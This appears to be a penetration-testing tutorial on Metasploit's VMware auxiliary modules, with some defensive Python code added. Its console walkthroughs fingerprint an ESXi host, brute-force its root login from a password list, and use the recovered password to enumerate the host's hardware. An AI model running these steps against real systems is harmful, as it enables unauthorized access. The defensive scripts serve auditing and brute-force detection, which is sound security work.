The VMware auxiliary modules in the Metasploit Framework let you discover VMware systems on the local network, enumerate VMware users and groups, and gather information about their permissions. You can also determine whether a VM host is running on ESX/ESXi and retrieve its version information.
To find all auxiliary modules related to VMware, use the following search command:
msf > search type:auxiliary vmware
Matching Modules
================
Name Disclosure Date Rank Description
----  ---------------  ----  -----------
auxiliary/admin/vmware/poweroff_vm normal VMWare Power Off Virtual Machine
auxiliary/admin/vmware/poweron_vm normal VMWare Power On Virtual Machine
auxiliary/admin/vmware/tag_vm normal VMWare Tag Virtual Machine
auxiliary/admin/vmware/terminate_esx_sessions normal VMWare Terminate ESX Login Sessions
auxiliary/scanner/http/vmware_server_dir_trav normal VMware Server Directory Transversal Vulnerability
auxiliary/scanner/vmware/esx_fingerprint normal VMWare ESX/ESXi Fingerprint Scanner
auxiliary/scanner/vmware/vmauthd_login normal VMWare Authentication Daemon Login Scanner
auxiliary/scanner/vmware/vmauthd_version normal VMWare Authentication Daemon Version Scanner
auxiliary/scanner/vmware/vmware_enum_permissions normal VMWare Enumerate Permissions
auxiliary/scanner/vmware/vmware_enum_sessions normal VMWare Enumerate Active Sessions
auxiliary/scanner/vmware/vmware_enum_users normal VMWare Enumerate User Accounts
auxiliary/scanner/vmware/vmware_enum_vms normal VMWare Enumerate Virtual Machines
auxiliary/scanner/vmware/vmware_host_details normal VMWare Enumerate Host Details
auxiliary/scanner/vmware/vmware_http_login normal VMWare Web Login Scanner
auxiliary/scanner/vmware/vmware_screenshot_stealer normal VMWare Screenshot Stealer
You can get detailed information about any module with the info command:
msf > info auxiliary/scanner/vmware/esx_fingerprint
Name: VMWare ESX/ESXi Fingerprint Scanner
Module: auxiliary/scanner/vmware/esx_fingerprint
Version: $Revision$
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
TheLightCosine <thelightcosine@metasploit.com>
Basic options:
Name Current Setting Required Description
----  ---------------  --------  -----------
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 443 yes The target port
THREADS 1 yes The number of concurrent threads
URI /sdk no The uri path to test against
VHOST no HTTP server virtual host
Description:
This module accesses the web API interfaces for VMware ESX/ESXi
servers and attempts to identify version information for that
server.
Examples:
Identifying the VMware systems on the network and their versions (esx_fingerprint)
msf > use auxiliary/scanner/vmware/esx_fingerprint
msf auxiliary(esx_fingerprint) > show options
Module options (auxiliary/scanner/vmware/esx_fingerprint):
Name Current Setting Required Description
----  ---------------  --------  -----------
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 443 yes The target port
THREADS 1 yes The number of concurrent threads
URI /sdk no The uri path to test against
VHOST no HTTP server virtual host
msf auxiliary(esx_fingerprint) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(esx_fingerprint) > run
[+] Identified VMware ESXi 4.1.0 build-260247
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Note: RHOSTS can be set to a single IP address (1.1.1.1), a subnet (1.1.1.0/8), or a list read from a file (file:/tmp/ip.lst).
The virtualization host was identified as running VMware ESXi 4.1.0.
VMWare Authentication Daemon Version Scanner (vmauthd_version)
This module connects to TCP port 902 and reports information about the target's authentication service.
msf > use auxiliary/scanner/vmware/vmauthd_version
msf auxiliary(vmauthd_version) > info
Name: VMWare Authentication Daemon Version Scanner
Module: auxiliary/scanner/vmware/vmauthd_version
Version: $Revision$
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
TheLightCosine <thelightcosine@metasploit.com>
hdm <hdm@metasploit.com>
Basic options:
Name Current Setting Required Description
----  ---------------  --------  -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 902 yes The target port
THREADS 1 yes The number of concurrent threads
Description:
This module will identify information about a host through the
vmauthd service.
msf auxiliary(vmauthd_version) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(vmauthd_version) > run
[*] 1.1.1.1:902 Switching to SSL connection...
[*] 1.1.1.1:902 Banner: 220 VMware Authentication Daemon Version 1.10: SSL Required, ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC , VMXARGS supported Certificate:/C=US/ST=California/L=Palo Alto/O=VMware, Inc/OU=VMware ESX Server Default Certificate/emailAddress=ssl-certificates@vmware.com/CN=localhost.localdomain/unstructuredName=1295122519,564d7761726520496e632e
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
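The banner above already tells a defender two things worth fixing: the host still presents the default VMware certificate, and its CN is localhost.localdomain. The following is an added example, not part of the original post or of Metasploit: it parses that banner and reports such hardening gaps. The function names parse_banner and audit are assumptions chosen for this illustration.

```python
import re

# Banner copied verbatim from the vmauthd_version output shown above.
BANNER = ("220 VMware Authentication Daemon Version 1.10: SSL Required, "
          "ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC , VMXARGS supported "
          "Certificate:/C=US/ST=California/L=Palo Alto/O=VMware, Inc/"
          "OU=VMware ESX Server Default Certificate/"
          "emailAddress=ssl-certificates@vmware.com/CN=localhost.localdomain/"
          "unstructuredName=1295122519,564d7761726520496e632e")

BANNER_RE = re.compile(r"220 VMware Authentication Daemon Version (\S+?):\s*(.*)")

def parse_banner(banner):
    """Split a vmauthd banner into version, capability list and cert subject."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None  # not a vmauthd banner
    version, rest = m.groups()
    # Everything before "Certificate:" is a comma-separated capability list.
    caps, _, subject = rest.partition("Certificate:")
    capabilities = [c.strip() for c in caps.split(",") if c.strip()]
    # The subject is an OpenSSL one-line DN: /KEY=value/KEY=value/...
    fields = dict(re.findall(r"/([A-Za-z]+)=([^/]*)", subject))
    return {"version": version, "capabilities": capabilities, "subject": fields}

def audit(info):
    """Return hardening findings derived only from the parsed banner."""
    findings = []
    subject = info["subject"]
    if "Default Certificate" in subject.get("OU", ""):
        findings.append("default VMware self-signed certificate is still installed")
    if subject.get("CN", "").startswith("localhost"):
        findings.append("certificate CN does not match a real host name")
    if "SSL Required" not in info["capabilities"]:
        findings.append("daemon does not require SSL")
    return findings

if __name__ == "__main__":
    parsed = parse_banner(BANNER)
    print("vmauthd version:", parsed["version"])
    for finding in audit(parsed):
        print("finding:", finding)
```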
VMWare Web Login Scan (vmware_http_login)
This module performs password guessing against the VMware authentication service; you can use a dictionary file for this.
msf > use auxiliary/scanner/vmware/vmware_http_login
msf auxiliary(vmware_http_login) > set PASS_FILE /root/pass.lst
PASS_FILE => /root/pass.lst
msf auxiliary(vmware_http_login) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(vmware_http_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(vmware_http_login) > run
[+] 1.1.1.1:443 - Identified VMware ESXi 4.1.0 build-260247
[-] 1.1.1.1:443 - Login Failure (root:)
[-] 1.1.1.1:443 - Login Failure (root:root)
[-] 1.1.1.1:443 - Login Failure (root:admin)
[-] 1.1.1.1:443 - Login Failure (root:password)
[-] 1.1.1.1:443 - Login Failure (root:123456)
[-] 1.1.1.1:443 - Login Failure (root:P@ssw0rd)
[+] 1.1.1.1:443 - Successful Login! (root:BenimGizliParolam)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
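On the monitoring side, the session above looks like a burst of failed logins for one account from one source, followed by a success. The following is an added detection example, not part of the original post: it flags that pattern in normalized authentication events. The event tuples are constructed sample data and are not the ESXi log format; the threshold and window values are assumptions to tune for your environment.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, source address, account, outcome).
# Map the fields of your own authentication logs onto this shape.
EVENTS = [(f"2012-02-01T10:00:0{i}", "192.0.2.50", "root", "fail")
          for i in range(1, 7)] + [
    ("2012-02-01T10:00:07", "192.0.2.50", "root", "success"),
    ("2012-02-01T10:05:00", "198.51.100.7", "admin", "fail"),     # ordinary typo
    ("2012-02-01T10:05:09", "198.51.100.7", "admin", "success"),
]

def detect_guessing(events, threshold=5, window=timedelta(seconds=60)):
    """Alert on >= threshold failures per (source, account) inside the window,
    and again if a successful login follows while the burst is still recent."""
    recent = defaultdict(deque)   # (source, account) -> times of recent failures
    flagged = set()               # keys that already raised a guessing alert
    alerts = []
    for ts, src, user, outcome in sorted(events):
        now = datetime.fromisoformat(ts)
        key = (src, user)
        failures = recent[key]
        # Drop failures that have aged out of the sliding window.
        while failures and now - failures[0] > window:
            failures.popleft()
        if outcome == "fail":
            failures.append(now)
            if len(failures) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("guessing", src, user, ts))
        elif outcome == "success":
            # A success right after a flagged burst means a password was found.
            if key in flagged and failures:
                alerts.append(("success_after_guessing", src, user, ts))
            failures.clear()
            flagged.discard(key)
    return alerts

if __name__ == "__main__":
    for alert in detect_guessing(EVENTS):
        print(alert)
```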
Getting Detailed Information About a VMWare Host (vmware_host_details)
Once credentials have been obtained, this auxiliary module can be used to retrieve detailed information from the VMware system.
msf > use auxiliary/scanner/vmware/vmware_host_details
msf auxiliary(vmware_host_details) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(vmware_host_details) > set PASSWORD BenimGizliParolam
PASSWORD => BenimGizliParolam
msf auxiliary(vmware_host_details) > set HW_DETAILS true
HW_DETAILS => true
msf auxiliary(vmware_host_details) > run
[+] VMWare Host at 1.1.1.1 details
-----------------------------
---
- ha-host:
    hardware:
      vendor: System manufacturer
      model: System Product Name
      uuid: 8065001e-8c00-00df-2315-bcaec504ad78
      otherIdentifyingInfo:
        identifierValue: ! ' Asset-1234567890'
        identifierType:
          label: AssetTag
          summary: AssetTag
          key: AssetTag
      memorySize: '16909213696'
      cpuModel: AMD Phenom(tm) II X4 965 Processor
      cpuMhz: '3411'
      numCpuPkgs: '1'
      numCpuCores: '4'
      numCpuThreads: '4'
      numNics: '1'
      numHBAs: '8'
    runtime:
      connectionState: connected
      powerState: poweredOn
      inMaintenanceMode: 'false'
      bootTime: '2012-01-30T17:08:58.847297Z'
    config:
      name: localhost.
      port: '902'
      product:
Author:
Ozan UÇAR
ozan.ucar@bga.com.tr